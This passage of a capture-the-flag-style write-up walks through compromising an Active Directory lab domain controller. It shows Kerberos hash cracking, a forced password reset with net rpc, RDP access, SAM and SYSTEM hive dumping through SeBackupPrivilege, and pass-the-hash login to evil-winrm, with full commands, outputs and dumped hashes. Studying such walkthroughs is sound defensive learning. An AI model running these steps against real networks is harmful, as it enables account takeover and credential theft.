john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
haze1988 (?)
1g 0:00:00:07 DONE (2024-10-19 14:39) 0.1381g/s 1058Kp/s 1058Kc/s 1058KC/s hazel564..hazamanaz
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that I have another new set of credential, time to check bloodhound again.
Since admins
OU contains tier1
, hazel.green
might have permission to molly.smith
user which including changing the user’s password.
1
net rpc password "Molly.Smith" "P@ssw0rd" -U "hokkaido-aerospace.com"/"hazel.green"%'haze1988' -S 192.168.135.40
Port 3389
Now that the password have been changed, time to check using netexec
.
1
2
3
netexec rdp 192.168.135.40 -u molly.smith -p 'P@ssw0rd'
RDP 192.168.135.40 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:hokkaido-aerospace.com) (nla:True)
RDP 192.168.135.40 3389 DC [+] hokkaido-aerospace.com\molly.smith:P@ssw0rd (Pwn3d!)
With the Pwn3d!
message, I could just perform remote desktop to the machine now.
1
xfreerdp /cert-ignore /u:molly.smith /p:P@ssw0rd /v:192.168.135.40
1
2
3
4
5
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Users\molly.smith>whoami
haero\molly.smith
Now that I have shell access but not administrator account, time to privilege escalation.
Privilege Escalation
I tried uploading winpeas to run but the machine has antivirus on and auto remove my winpeas. So I’ll just check manually and hope for a good result.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
C:\Users\Public>whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Group used for deny only
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
HAERO\it Group S-1-5-21-3227296914-974780204-1325941497-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
HAERO\WSUS Administrators Alias S-1-5-21-3227296914-974780204-1325941497-1103 Mandatory group, Enabled by default, Enabled group, Local Group
HAERO\WSUS Reporters Alias S-1-5-21-3227296914-974780204-1325941497-1104 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
After looking at my current user’s group, I think that I might be able to run the command shell as administrator since I have a group tier1-admins
. After using my current credentials to run the command shell as administrator, I noticed that a new shell was spawn but I do not have administrator shell. Instead, I was given more permission.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
C:\Windows\system32>whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
haero\molly.smith S-1-5-21-3227296914-974780204-1325941497-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAERO\Tier1-Admins Group S-1-5-21-3227296914-974780204-1325941497-1141 Mandatory group, Enabled by default, Enabled group
HAERO\it Group S-1-5-21-3227296914-974780204-1325941497-1105 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
HAERO\WSUS Administrators Alias S-1-5-21-3227296914-974780204-1325941497-1103 Mandatory group, Enabled by default, Enabled group, Local Group
HAERO\WSUS Reporters Alias S-1-5-21-3227296914-974780204-1325941497-1104 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeSystemtimePrivilege Change the system time Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Now I have SeBackupPrivilege
with the administrator shell. I could just dump SAM
and SYSTEM
from the machine and get hashes.
1
2
3
4
5
C:\Users\Public>reg save hklm\sam sam
The operation completed successfully.
C:\Users\Public>reg save hklm\system system
The operation completed successfully.
Now just transfer the file to host and get the hash.
1
2
3
4
5
6
7
8
9
10
impacket-secretsdump -sam sam -system system local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Now that I have the hash, I could just access the machine using winrm.
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.135.40 -u Administrator -H d752482897d54e239376fddb2a2109e4
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
haero\administrator
With that, I got the administrator shell ~
Things I learned from this machine
- enumerate user using
kerbrute
if there’s nothing else to do - password might be username
- get bloodhound information asap and understand it
GenericWrite
to user = can get the user hash (my own understanding)- can change other user password if under own OU (I’m also not that sure)
- run cmd as administrator if under group that has the name admin or just try
SeBackupPrivilege
= can get SAM and SYSTEM